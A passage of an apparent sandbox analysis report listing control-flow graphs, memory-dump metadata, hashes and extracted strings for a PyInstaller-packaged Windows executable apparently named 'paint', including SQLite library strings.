7ff6f0bd457f 77916->77917 77918 7ff6f0bdc5c0 _log10_special 8 API calls 77917->77918 77919 7ff6f0bd45a7 77918->77919 77919->77852 77920 7ff6f0bd9070 77919->77920 77921 7ff6f0bd9400 2 API calls 77920->77921 77922 7ff6f0bd9084 LoadLibraryExW 77921->77922 77923 7ff6f0bd90a3 __vcrt_freefls 77922->77923 77923->77852 77924->77844 77925->77846 77926->77844 77927->77844 77928->77844 77931 7ff6f0bd541c 77929->77931 77930 7ff6f0bd5424 77930->77869 77931->77930 77934 7ff6f0bd55c4 77931->77934 77965 7ff6f0be6b14 48 API calls 77931->77965 77932 7ff6f0bd5787 __vcrt_freefls 77932->77869 77933 7ff6f0bd47c0 47 API calls 77933->77934 77934->77932 77934->77933 77937 7ff6f0bd4cb0 77936->77937 77938 7ff6f0bdc5c0 _log10_special 8 API calls 77937->77938 77939 7ff6f0bd4d1a 77938->77939 77939->77875 77939->77876 77941 7ff6f0bd4d55 77940->77941 77942 7ff6f0bd1c80 49 API calls 77941->77942 77943 7ff6f0bd4da1 77942->77943 77944 7ff6f0bd4e23 __vcrt_freefls 77943->77944 77945 7ff6f0bd1c80 49 API calls 77943->77945 77947 7ff6f0bdc5c0 _log10_special 8 API calls 77944->77947 77946 7ff6f0bd4de0 77945->77946 77946->77944 77949 7ff6f0bd9400 2 API calls 77946->77949 77948 7ff6f0bd4e6e 77947->77948 77948->77890 77948->77891 77950 7ff6f0bd4df6 77949->77950 77951 7ff6f0bd9400 2 API calls 77950->77951 77952 7ff6f0bd4e0d 77951->77952 77953 7ff6f0bd9400 2 API calls 77952->77953 77953->77944 77954->77878 77955->77878 77956->77878 77957->77878 77958->77878 77959->77878 77960->77878 77961->77878 77962->77900 77963->77901 77964->77878 77965->77931 77966->77908 77968 7ff6f0be7968 77967->77968 77971 7ff6f0be7444 77968->77971 77970 7ff6f0be7981 77970->77778 77972 7ff6f0be745f 77971->77972 77973 7ff6f0be748e 77971->77973 77982 7ff6f0bea884 37 API calls 2 library calls 77972->77982 77981 7ff6f0be54dc EnterCriticalSection 77973->77981 77976 7ff6f0be747f 77976->77970 77977 7ff6f0be7493 77978 7ff6f0be74b0 38 API calls 77977->77978 77979 7ff6f0be749f 77978->77979 77980 7ff6f0be54e8 _fread_nolock LeaveCriticalSection 77979->77980 77980->77976 77982->77976

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 7ff6f0bd1000-7ff6f0bd3806 call 7ff6f0bdfe88 call 7ff6f0bdfe90 call 7ff6f0bdc8c0 call 7ff6f0be5460 call 7ff6f0be54f4 call 7ff6f0bd36b0 14 7ff6f0bd3814-7ff6f0bd3836 call 7ff6f0bd1950 0->14 15 7ff6f0bd3808-7ff6f0bd380f 0->15 20 7ff6f0bd391b-7ff6f0bd3931 call 7ff6f0bd45b0 14->20 21 7ff6f0bd383c-7ff6f0bd3856 call 7ff6f0bd1c80 14->21 16 7ff6f0bd3c97-7ff6f0bd3cb2 call 7ff6f0bdc5c0 15->16 28 7ff6f0bd3933-7ff6f0bd3960 call 7ff6f0bd7f80 20->28 29 7ff6f0bd396a-7ff6f0bd397f call 7ff6f0bd2710 20->29 25 7ff6f0bd385b-7ff6f0bd389b call 7ff6f0bd8a20 21->25 34 7ff6f0bd38c1-7ff6f0bd38cc call 7ff6f0be4fa0 25->34 35 7ff6f0bd389d-7ff6f0bd38a3 25->35 41 7ff6f0bd3962-7ff6f0bd3965 call 7ff6f0be00bc 28->41 42 7ff6f0bd3984-7ff6f0bd39a6 call 7ff6f0bd1c80 28->42 37 7ff6f0bd3c8f 29->37 49 7ff6f0bd38d2-7ff6f0bd38e1 call 7ff6f0bd8a20 34->49 50 7ff6f0bd39fc-7ff6f0bd3a2a call 7ff6f0bd8b30 call 7ff6f0bd8b90 * 3 34->50 38 7ff6f0bd38a5-7ff6f0bd38ad 35->38 39 7ff6f0bd38af-7ff6f0bd38bd call 7ff6f0bd8b90 35->39 37->16 38->39 39->34 41->29 51 7ff6f0bd39b0-7ff6f0bd39b9 42->51 58 7ff6f0bd39f4-7ff6f0bd39f7 call 7ff6f0be4fa0 49->58 59 7ff6f0bd38e7-7ff6f0bd38ed 49->59 75 7ff6f0bd3a2f-7ff6f0bd3a3e call 7ff6f0bd8a20 50->75 51->51 55 7ff6f0bd39bb-7ff6f0bd39d8 call 7ff6f0bd1950 51->55 55->25 68 7ff6f0bd39de-7ff6f0bd39ef call 7ff6f0bd2710 55->68 58->50 61 7ff6f0bd38f0-7ff6f0bd38fc 59->61 66 7ff6f0bd3905-7ff6f0bd3908 61->66 67 7ff6f0bd38fe-7ff6f0bd3903 61->67 66->58 70 7ff6f0bd390e-7ff6f0bd3916 call 7ff6f0be4fa0 66->70 67->61 67->66 68->37 70->75 79 7ff6f0bd3a44-7ff6f0bd3a47 75->79 80 7ff6f0bd3b45-7ff6f0bd3b53 75->80 79->80 83 7ff6f0bd3a4d-7ff6f0bd3a50 79->83 81 7ff6f0bd3a67 80->81 82 7ff6f0bd3b59-7ff6f0bd3b5d 80->82 84 7ff6f0bd3a6b-7ff6f0bd3a90 call 7ff6f0be4fa0 81->84 82->84 85 7ff6f0bd3b14-7ff6f0bd3b17 83->85 86 7ff6f0bd3a56-7ff6f0bd3a5a 83->86 95 7ff6f0bd3a92-7ff6f0bd3aa6 call 7ff6f0bd8b30 84->95 96 7ff6f0bd3aab-7ff6f0bd3ac0 84->96 87 7ff6f0bd3b2f-7ff6f0bd3b40 call 7ff6f0bd2710 85->87 88 7ff6f0bd3b19-7ff6f0bd3b1d 85->88 86->85 89 7ff6f0bd3a60 86->89 97 7ff6f0bd3c7f-7ff6f0bd3c87 87->97 88->87 93 7ff6f0bd3b1f-7ff6f0bd3b2a 88->93 89->81 93->84 95->96 99 7ff6f0bd3ac6-7ff6f0bd3aca 96->99 100 7ff6f0bd3be8-7ff6f0bd3bfa call 7ff6f0bd8a20 96->100 97->37 101 7ff6f0bd3ad0-7ff6f0bd3ae8 call 7ff6f0be52c0 99->101 102 7ff6f0bd3bcd-7ff6f0bd3be2 call 7ff6f0bd1940 99->102 109 7ff6f0bd3c2e 100->109 110 7ff6f0bd3bfc-7ff6f0bd3c02 100->110 113 7ff6f0bd3b62-7ff6f0bd3b7a call 7ff6f0be52c0 101->113 114 7ff6f0bd3aea-7ff6f0bd3b02 call 7ff6f0be52c0 101->114 102->99 102->100 115 7ff6f0bd3c31-7ff6f0bd3c40 call 7ff6f0be4fa0 109->115 111 7ff6f0bd3c04-7ff6f0bd3c1c 110->111 112 7ff6f0bd3c1e-7ff6f0bd3c2c 110->112 111->115 112->115 122 7ff6f0bd3b7c-7ff6f0bd3b80 113->122 123 7ff6f0bd3b87-7ff6f0bd3b9f call 7ff6f0be52c0 113->123 114->102 124 7ff6f0bd3b08-7ff6f0bd3b0f 114->124 125 7ff6f0bd3d41-7ff6f0bd3d63 call 7ff6f0bd44d0 115->125 126 7ff6f0bd3c46-7ff6f0bd3c4a 115->126 122->123 139 7ff6f0bd3ba1-7ff6f0bd3ba5 123->139 140 7ff6f0bd3bac-7ff6f0bd3bc4 call 7ff6f0be52c0 123->140 124->102 137 7ff6f0bd3d65-7ff6f0bd3d6f call 7ff6f0bd4620 125->137 138 7ff6f0bd3d71-7ff6f0bd3d82 call 7ff6f0bd1c80 125->138 129 7ff6f0bd3cd4-7ff6f0bd3ce6 call 7ff6f0bd8a20 126->129 130 7ff6f0bd3c50-7ff6f0bd3c5f call 7ff6f0bd90e0 126->130 144 7ff6f0bd3d35-7ff6f0bd3d3c 129->144 145 7ff6f0bd3ce8-7ff6f0bd3ceb 129->145 141 7ff6f0bd3cb3-7ff6f0bd3cbd call 7ff6f0bd8850 130->141 142 7ff6f0bd3c61 130->142 151 7ff6f0bd3d87-7ff6f0bd3d96 137->151 138->151 139->140 140->102 159 7ff6f0bd3bc6 140->159 163 7ff6f0bd3cbf-7ff6f0bd3cc6 141->163 164 7ff6f0bd3cc8-7ff6f0bd3ccf 141->164 149 7ff6f0bd3c68 call 7ff6f0bd2710 142->149 144->149 145->144 148 7ff6f0bd3ced-7ff6f0bd3d10 call 7ff6f0bd1c80 145->148 166 7ff6f0bd3d12-7ff6f0bd3d26 call 7ff6f0bd2710 call 7ff6f0be4fa0 148->166 167 7ff6f0bd3d2b-7ff6f0bd3d33 call 7ff6f0be4fa0 148->167 161 7ff6f0bd3c6d-7ff6f0bd3c77 149->161 156 7ff6f0bd3dc4-7ff6f0bd3dda call 7ff6f0bd9400 151->156 157 7ff6f0bd3d98-7ff6f0bd3d9f 151->157 172 7ff6f0bd3ddc 156->172 173 7ff6f0bd3de8-7ff6f0bd3e04 SetDllDirectoryW 156->173 157->156 162 7ff6f0bd3da1-7ff6f0bd3da5 157->162 159->102 161->97 162->156 168 7ff6f0bd3da7-7ff6f0bd3dbe SetDllDirectoryW LoadLibraryExW 162->168 163->149 164->151 166->161 167->151 168->156 172->173 174 7ff6f0bd3f01-7ff6f0bd3f08 173->174 175 7ff6f0bd3e0a-7ff6f0bd3e19 call 7ff6f0bd8a20 173->175 180 7ff6f0bd3f0e-7ff6f0bd3f15 174->180 181 7ff6f0bd3ffc-7ff6f0bd4004 174->181 188 7ff6f0bd3e32-7ff6f0bd3e3c call 7ff6f0be4fa0 175->188 189 7ff6f0bd3e1b-7ff6f0bd3e21 175->189 180->181 184 7ff6f0bd3f1b-7ff6f0bd3f25 call 7ff6f0bd33c0 180->184 185 7ff6f0bd4006-7ff6f0bd4023 PostMessageW GetMessageW 181->185 186 7ff6f0bd4029-7ff6f0bd4034 call 7ff6f0bd36a0 call 7ff6f0bd3360 181->186 184->161 196 7ff6f0bd3f2b-7ff6f0bd3f3f call 7ff6f0bd90c0 184->196 185->186 200 7ff6f0bd4039-7ff6f0bd405b call 7ff6f0bd3670 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 186->200 201 7ff6f0bd3ef2-7ff6f0bd3efc call 7ff6f0bd8b30 188->201 202 7ff6f0bd3e42-7ff6f0bd3e48 188->202 192 7ff6f0bd3e23-7ff6f0bd3e2b 189->192 193 7ff6f0bd3e2d-7ff6f0bd3e2f 189->193 192->193 193->188 207 7ff6f0bd3f64-7ff6f0bd3fa7 call 7ff6f0bd8b30 call 7ff6f0bd8bd0 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 call 7ff6f0bd8ad0 196->207 208 7ff6f0bd3f41-7ff6f0bd3f5e PostMessageW GetMessageW 196->208 201->174 202->201 205 7ff6f0bd3e4e-7ff6f0bd3e54 202->205 210 7ff6f0bd3e5f-7ff6f0bd3e61 205->210 211 7ff6f0bd3e56-7ff6f0bd3e58 205->211 249 7ff6f0bd3fe9-7ff6f0bd3ff7 call 7ff6f0bd1900 207->249 250 7ff6f0bd3fa9-7ff6f0bd3fb3 call 7ff6f0bd9200 207->250 208->207 210->174 215 7ff6f0bd3e67-7ff6f0bd3e83 call 7ff6f0bd6db0 call 7ff6f0bd7330 210->215 214 7ff6f0bd3e5a 211->214 211->215 214->174 227 7ff6f0bd3e85-7ff6f0bd3e8c 215->227 228 7ff6f0bd3e8e-7ff6f0bd3e95 215->228 230 7ff6f0bd3edb-7ff6f0bd3ef0 call 7ff6f0bd2a50 call 7ff6f0bd6fb0 call 7ff6f0bd6d60 227->230 231 7ff6f0bd3eaf-7ff6f0bd3eb9 call 7ff6f0bd71a0 228->231 232 7ff6f0bd3e97-7ff6f0bd3ea4 call 7ff6f0bd6df0 228->232 230->174 244 7ff6f0bd3ec4-7ff6f0bd3ed2 call 7ff6f0bd74e0 231->244 245 7ff6f0bd3ebb-7ff6f0bd3ec2 231->245 232->231 243 7ff6f0bd3ea6-7ff6f0bd3ead 232->243 243->230 244->174 255 7ff6f0bd3ed4 244->255 245->230 249->161 250->249 259 7ff6f0bd3fb5-7ff6f0bd3fca 250->259 255->230 260 7ff6f0bd3fe4 call 7ff6f0bd2a50 259->260 261 7ff6f0bd3fcc-7ff6f0bd3fdf call 7ff6f0bd2710 call 7ff6f0bd1900 259->261 260->249 261->161
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                                                • Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                                • Instruction ID: b7b4922780083decd8472ad9f1faaa48d88e0f93a3ca88e2fd82dc7981fd91c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA326E25A0E682B1EB259B2496543B9E752AF56B80FC44032DA6FC33D7FF2EE555C300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 345 7ffdfb0792c0-7ffdfb07933f 346 7ffdfb07949d-7ffdfb0794b3 345->346 347 7ffdfb079345-7ffdfb07934f 345->347 349 7ffdfb0793af-7ffdfb0793f5 call 7ffdfb066180 346->349 350 7ffdfb0794b9-7ffdfb0794bf 346->350 347->346 348 7ffdfb079355-7ffdfb079358 347->348 348->350 352 7ffdfb07935e 348->352 357 7ffdfb079a8e-7ffdfb079a91 349->357 358 7ffdfb0793fb-7ffdfb07945f call 7ffdfb19382c 349->358 350->349 353 7ffdfb0794c5-7ffdfb0794db call 7ffdfb066180 350->353 355 7ffdfb079365-7ffdfb07936e 352->355 362 7ffdfb079aee 353->362 365 7ffdfb0794e1-7ffdfb0794fc 353->365 355->355 359 7ffdfb079370-7ffdfb07937f call 7ffdfb066180 355->359 361 7ffdfb079a93-7ffdfb079a9a 357->361 357->362 373 7ffdfb079788-7ffdfb079798 358->373 374 7ffdfb079465-7ffdfb079481 00007FFE1A463010 358->374 359->362 375 7ffdfb079385-7ffdfb07939b 00007FFE1A463010 359->375 367 7ffdfb079a9c-7ffdfb079aa6 361->367 368 7ffdfb079ae5 361->368 366 7ffdfb079af3-7ffdfb079b0a 362->366 381 7ffdfb0794fe-7ffdfb07950f 365->381 382 7ffdfb079516-7ffdfb07951d 365->382 371 7ffdfb079aae-7ffdfb079adb 367->371 372 7ffdfb079aa8 367->372 368->362 371->362 405 7ffdfb079add-7ffdfb079ae3 371->405 372->371 379 7ffdfb0796df-7ffdfb079704 373->379 377 7ffdfb07963b 374->377 378 7ffdfb079487-7ffdfb079498 00007FFE1A463010 374->378 380 7ffdfb0793a0-7ffdfb0793a7 375->380 383 7ffdfb07963e-7ffdfb079687 00007FFE1A463010 * 2 377->383 378->383 386 7ffdfb07983f 379->386 387 7ffdfb07970a-7ffdfb07970f 379->387 380->380 388 7ffdfb0793a9 380->388 381->382 384 7ffdfb079520-7ffdfb079527 382->384 389 7ffdfb0796dd 383->389 390 7ffdfb079689-7ffdfb079690 383->390 384->384 392 7ffdfb079529-7ffdfb079530 384->392 391 7ffdfb079844-7ffdfb079852 386->391 387->386 393 7ffdfb079715-7ffdfb079741 call 7ffdfb06ffe0 387->393 388->349 389->379 394 7ffdfb07977a-7ffdfb079783 390->394 395 7ffdfb079696-7ffdfb0796a0 390->395 396 7ffdfb079855-7ffdfb079858 391->396 397 7ffdfb079537-7ffdfb07953e 392->397 399 7ffdfb079744-7ffdfb079764 393->399 394->389 400 7ffdfb0796a2 395->400 401 7ffdfb0796a8-7ffdfb0796d5 395->401 402 7ffdfb07985e-7ffdfb079879 call 7ffdfb078840 396->402 403 7ffdfb07990b-7ffdfb079915 396->403 397->397 404 7ffdfb079540-7ffdfb079557 397->404 406 7ffdfb07983a-7ffdfb07983d 399->406 407 7ffdfb07976a-7ffdfb079774 399->407 400->401 401->389 446 7ffdfb0796d7 401->446 402->403 427 7ffdfb07987f-7ffdfb079903 402->427 412 7ffdfb079923-7ffdfb079936 call 7ffdfb074700 403->412 413 7ffdfb079917-7ffdfb079920 403->413 409 7ffdfb079559 404->409 410 7ffdfb0795a7-7ffdfb0795ae 404->410 405->362 406->396 414 7ffdfb07979d-7ffdfb0797a0 407->414 415 7ffdfb079776-7ffdfb079778 407->415 417 7ffdfb079560-7ffdfb079567 409->417 419 7ffdfb0795d2-7ffdfb0795d9 410->419 420 7ffdfb0795b0-7ffdfb0795b7 410->420 431 7ffdfb079a80-7ffdfb079a8c 412->431 432 7ffdfb07993c-7ffdfb079946 412->432 413->412 426 7ffdfb0797a2-7ffdfb0797aa 414->426 415->426 428 7ffdfb079570-7ffdfb079579 417->428 424 7ffdfb0795db-7ffdfb0795e5 419->424 425 7ffdfb07962a 419->425 420->349 429 7ffdfb0795bd-7ffdfb0795cc call 7ffdfb125b50 420->429 433 7ffdfb0795ed-7ffdfb07961a 424->433 434 7ffdfb0795e7 424->434 448 7ffdfb079633-7ffdfb079636 425->448 438 7ffdfb0797ce-7ffdfb0797e4 call 7ffdfb126b40 426->438 439 7ffdfb0797ac-7ffdfb0797c0 call 7ffdfb077c10 426->439 452 7ffdfb079969-7ffdfb07996f 427->452 453 7ffdfb079905 427->453 428->428 435 7ffdfb07957b-7ffdfb079589 428->435 429->349 429->419 431->366 442 7ffdfb07994e-7ffdfb079961 432->442 443 7ffdfb079948 432->443 433->448 469 7ffdfb07961c-7ffdfb079625 433->469 434->433 445 7ffdfb079590-7ffdfb079599 435->445 457 7ffdfb0797fd 438->457 458 7ffdfb0797e6-7ffdfb0797fb call 7ffdfb0de010 438->458 439->438 462 7ffdfb0797c2-7ffdfb0797c7 439->462 442->452 443->442 445->445 454 7ffdfb07959b-7ffdfb0795a5 445->454 446->389 448->366 460 7ffdfb079971-7ffdfb079994 452->460 461 7ffdfb079998-7ffdfb0799a8 452->461 453->403 454->410 454->417 464 7ffdfb0797ff-7ffdfb079804 457->464 458->464 460->461 472 7ffdfb0799b0-7ffdfb0799e1 461->472 473 7ffdfb0799aa 461->473 462->438 467 7ffdfb079832-7ffdfb079838 464->467 468 7ffdfb079806-7ffdfb07981c call 7ffdfb126b40 464->468 467->391 468->406 479 7ffdfb07981e-7ffdfb079830 call 7ffdfb0de010 468->479 469->366 474 7ffdfb0799f4-7ffdfb0799fb 472->474 475 7ffdfb0799e3-7ffdfb0799f2 472->475 473->472 478 7ffdfb0799ff-7ffdfb079a21 call 7ffdfb077c10 474->478 475->478 484 7ffdfb079a23-7ffdfb079a27 478->484 485 7ffdfb079a29-7ffdfb079a2c 478->485 479->406 479->467 486 7ffdfb079a37-7ffdfb079a49 484->486 487 7ffdfb079a33 485->487 488 7ffdfb079a2e-7ffdfb079a31 485->488 489 7ffdfb079a54-7ffdfb079a66 486->489 490 7ffdfb079a4b-7ffdfb079a52 486->490 487->486 488->486 488->487 491 7ffdfb079a6a-7ffdfb079a7e 489->491 490->491 491->366
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                                • API String ID: 4225454184-4201244970
                                                                                                                                                                                                                                                                • Opcode ID: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
                                                                                                                                                                                                                                                                • Instruction ID: c8feec76c816ecda390c606168c817b423e7fdc3f47d0da950cda028859c3fa8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A832AF62B0A68396EB548F25E464BB87790FB46BA8F144234CA7E077E8DF3CE455D300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                                • API String ID: 4225454184-509082904
                                                                                                                                                                                                                                                                • Opcode ID: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
                                                                                                                                                                                                                                                                • Instruction ID: 138d9d4d2a1946d16cafb6fd6a179dc277fcd7b6117bf4df6ee99b05d72a9f3e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB127322B0A64785EB549F15A460BB967A1FF8AB88F144235EE6D077FCDF3CE445A300

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 670 7ff6f0bf5c70-7ff6f0bf5cab call 7ff6f0bf55f8 call 7ff6f0bf5600 call 7ff6f0bf5668 677 7ff6f0bf5ed5-7ff6f0bf5f21 call 7ff6f0bea970 call 7ff6f0bf55f8 call 7ff6f0bf5600 call 7ff6f0bf5668 670->677 678 7ff6f0bf5cb1-7ff6f0bf5cbc call 7ff6f0bf5608 670->678 704 7ff6f0bf605f-7ff6f0bf60cd call 7ff6f0bea970 call 7ff6f0bf15e8 677->704 705 7ff6f0bf5f27-7ff6f0bf5f32 call 7ff6f0bf5608 677->705 678->677 683 7ff6f0bf5cc2-7ff6f0bf5ccc 678->683 685 7ff6f0bf5cee-7ff6f0bf5cf2 683->685 686 7ff6f0bf5cce-7ff6f0bf5cd1 683->686 689 7ff6f0bf5cf5-7ff6f0bf5cfd 685->689 688 7ff6f0bf5cd4-7ff6f0bf5cdf 686->688 692 7ff6f0bf5ce1-7ff6f0bf5ce8 688->692 693 7ff6f0bf5cea-7ff6f0bf5cec 688->693 689->689 694 7ff6f0bf5cff-7ff6f0bf5d12 call 7ff6f0bed66c 689->694 692->688 692->693 693->685 696 7ff6f0bf5d1b-7ff6f0bf5d29 693->696 701 7ff6f0bf5d14-7ff6f0bf5d16 call 7ff6f0bea9b8 694->701 702 7ff6f0bf5d2a-7ff6f0bf5d36 call 7ff6f0bea9b8 694->702 701->696 711 7ff6f0bf5d3d-7ff6f0bf5d45 702->711 724 7ff6f0bf60cf-7ff6f0bf60d6 704->724 725 7ff6f0bf60db-7ff6f0bf60de 704->725 705->704 713 7ff6f0bf5f38-7ff6f0bf5f43 call 7ff6f0bf5638 705->713 711->711 714 7ff6f0bf5d47-7ff6f0bf5d58 call 7ff6f0bf04e4 711->714 713->704 722 7ff6f0bf5f49-7ff6f0bf5f6c call 7ff6f0bea9b8 GetTimeZoneInformation 713->722 714->677 723 7ff6f0bf5d5e-7ff6f0bf5db4 call 7ff6f0bfa540 * 4 call 7ff6f0bf5b8c 714->723 738 7ff6f0bf6034-7ff6f0bf605e call 7ff6f0bf55f0 call 7ff6f0bf55e0 call 7ff6f0bf55e8 722->738 739 7ff6f0bf5f72-7ff6f0bf5f93 722->739 782 7ff6f0bf5db6-7ff6f0bf5dba 723->782 730 7ff6f0bf616b-7ff6f0bf616e 724->730 728 7ff6f0bf6115-7ff6f0bf6128 call 7ff6f0bed66c 725->728 729 7ff6f0bf60e0 725->729 746 7ff6f0bf6133-7ff6f0bf614e call 7ff6f0bf15e8 728->746 747 7ff6f0bf612a 728->747 733 7ff6f0bf60e3 729->733 732 7ff6f0bf6174-7ff6f0bf617c call 7ff6f0bf5c70 730->732 730->733 740 7ff6f0bf60e8-7ff6f0bf6114 call 7ff6f0bea9b8 call 7ff6f0bdc5c0 732->740 733->740 741 7ff6f0bf60e3 call 7ff6f0bf5eec 733->741 749 7ff6f0bf5f95-7ff6f0bf5f9b 739->749 750 7ff6f0bf5f9e-7ff6f0bf5fa5 739->750 741->740 770 7ff6f0bf6155-7ff6f0bf6167 call 7ff6f0bea9b8 746->770 771 7ff6f0bf6150-7ff6f0bf6153 746->771 756 7ff6f0bf612c-7ff6f0bf6131 call 7ff6f0bea9b8 747->756 749->750 751 7ff6f0bf5fb9 750->751 752 7ff6f0bf5fa7-7ff6f0bf5faf 750->752 761 7ff6f0bf5fbb-7ff6f0bf602f call 7ff6f0bfa540 * 4 call 7ff6f0bf2bcc call 7ff6f0bf6184 * 2 751->761 752->751 758 7ff6f0bf5fb1-7ff6f0bf5fb7 752->758 756->729 758->761 761->738 770->730 771->756 784 7ff6f0bf5dc0-7ff6f0bf5dc4 782->784 785 7ff6f0bf5dbc 782->785 784->782 787 7ff6f0bf5dc6-7ff6f0bf5deb call 7ff6f0be6bc8 784->787 785->784 793 7ff6f0bf5dee-7ff6f0bf5df2 787->793 795 7ff6f0bf5df4-7ff6f0bf5dff 793->795 796 7ff6f0bf5e01-7ff6f0bf5e05 793->796 795->796 798 